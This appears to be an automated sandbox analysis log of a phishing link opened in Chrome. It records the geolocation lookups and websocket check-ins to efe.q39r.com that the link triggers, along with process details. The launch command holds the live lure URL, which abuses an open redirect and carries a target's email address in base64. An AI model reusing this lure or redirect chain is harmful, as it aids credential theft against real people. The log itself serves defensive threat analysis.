                                                                                  access-control-allow-origin: https://efe.q39r.com
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Referrer-Policy: same-origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaSTvzWkl3z55EyXIB2WRLjDl9vfTGwqaWdqk0kA%2FEveEKkSNY6LLbxUfIvPEYM%2BnIAyNeUmJrNR4YsRh6mmq%2Bh1CD6%2FFVdHqzI4eozkYF6javSYjgdQga2l"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faef5bb7e53cf-ATL
                                                                                  2024-04-25 16:24:27 UTC653INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 38 35 2e 31 35 32 2e 36 36 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 47 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72
                                                                                  Data Ascii: { "ip": "185.152.66.230", "network": "185.152.66.0/24", "version": "IPv4", "city": "Atlanta", "region": "Georgia", "region_code": "GA", "country": "US", "country_name": "United States", "country_code": "US", "countr
                                                                                  2024-04-25 16:24:27 UTC120INData Raw: 20 20 20 22 63 6f 75 6e 74 72 79 5f 61 72 65 61 22 3a 20 39 36 32 39 30 39 31 2e 30 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 36 30 30 36 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                  Data Ascii: "country_area": 9629091.0, "country_population": 327167434, "asn": "AS60068", "org": "Datacamp Limited"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  82192.168.2.17498013.221.38.2524435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:27 UTC337OUTGET /ip HTTP/1.1
                                                                                  Host: httpbin.org
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:24:27 UTC224INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:24:27 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 33
                                                                                  Connection: close
                                                                                  Server: gunicorn/19.9.0
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: true
                                                                                  2024-04-25 16:24:27 UTC33INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 0a 7d 0a
                                                                                  Data Ascii: { "origin": "185.152.66.230"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  83192.168.2.1749803172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:28 UTC1277OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: Upgrade
                                                                                  Pragma: no-cache
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Upgrade: websocket
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQiLCJtYWMiOiJmZmQ3ZDBmNmJkMTk0YWVlZTFmYWM0ZTYxNjc1NWU4ZDA5MDI1N2FlMTMxMDJlY2EwNDllYzhiMmJhYmVkYmE1IiwidGFnIjoiIn0%3D
                                                                                  Sec-WebSocket-Key: tQkN5eRpdabnc76NFv/lNg==
                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                  2024-04-25 16:24:28 UTC575INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:24:28 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFI5Wx%2ByCFCZkdHtZUR%2B73Ejqdq6AQgK6TFnGrI94uGoJDe70mAVb%2F5Pan6%2FH5SQWSBL6XRqGjF3AcDKHjeh7DP2QWZUCKgvBrm%2Blxxwd0RLtut4HCcuVPaTQTYZdOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faef9e9a8139a-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:24:28 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                  Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                  2024-04-25 16:24:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  84192.168.2.1749804172.67.69.2264435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:28 UTC352OUTGET /185.152.66.230/json/ HTTP/1.1
                                                                                  Host: ipapi.co
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:24:28 UTC663INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:24:28 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 773
                                                                                  Connection: close
                                                                                  Allow: OPTIONS, HEAD, OPTIONS, POST, GET
                                                                                  X-Frame-Options: DENY
                                                                                  Vary: Host, origin
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Referrer-Policy: same-origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrNmqHAvpKbCF5KdUKmY0mrJnAgfnaNk7qyNa%2FD53X6NR0IXmd5MK78OzVuxvP6G8nm5Y0sFX%2FQAzBcwE4fb4TEKa3lLpCQH%2FTrKwAiR8k7xlO0DyWMrR9JI"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faef9fec70c55-ATL
                                                                                  2024-04-25 16:24:28 UTC706INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 38 35 2e 31 35 32 2e 36 36 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 47 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72
                                                                                  Data Ascii: { "ip": "185.152.66.230", "network": "185.152.66.0/24", "version": "IPv4", "city": "Atlanta", "region": "Georgia", "region_code": "GA", "country": "US", "country_name": "United States", "country_code": "US", "countr
                                                                                  2024-04-25 16:24:28 UTC67INData Raw: 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 36 30 30 36 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                  Data Ascii: ": 327167434, "asn": "AS60068", "org": "Datacamp Limited"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  85192.168.2.1749805172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:49 UTC1277OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: Upgrade
                                                                                  Pragma: no-cache
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Upgrade: websocket
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQiLCJtYWMiOiJmZmQ3ZDBmNmJkMTk0YWVlZTFmYWM0ZTYxNjc1NWU4ZDA5MDI1N2FlMTMxMDJlY2EwNDllYzhiMmJhYmVkYmE1IiwidGFnIjoiIn0%3D
                                                                                  Sec-WebSocket-Key: bdfzC/19kvk12b7+Vn2qKw==
                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                  2024-04-25 16:24:49 UTC573INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:24:49 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvrJmj4ZMCFbWBMscl8V7fO4jqEDGJIW%2FiETBQwqJM7mMNTIakXbAKxjFmy1Mp%2BZ1iSUhVt7ydivfeFduMmb4ENlFVdCjr%2FoxfrBtx7%2Fwk43pC5VnboEBwk3UkNEzAg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faf7bfa66ada0-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:24:49 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                  Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                  2024-04-25 16:24:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:18:22:50
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==
                                                                                  Imagebase:0x7ff7d6f10000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:1
                                                                                  Start time:18:22:51
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1972,i,5865964949357321470,7222999334076516600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                  Imagebase:0x7ff7d6f10000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  No disassembly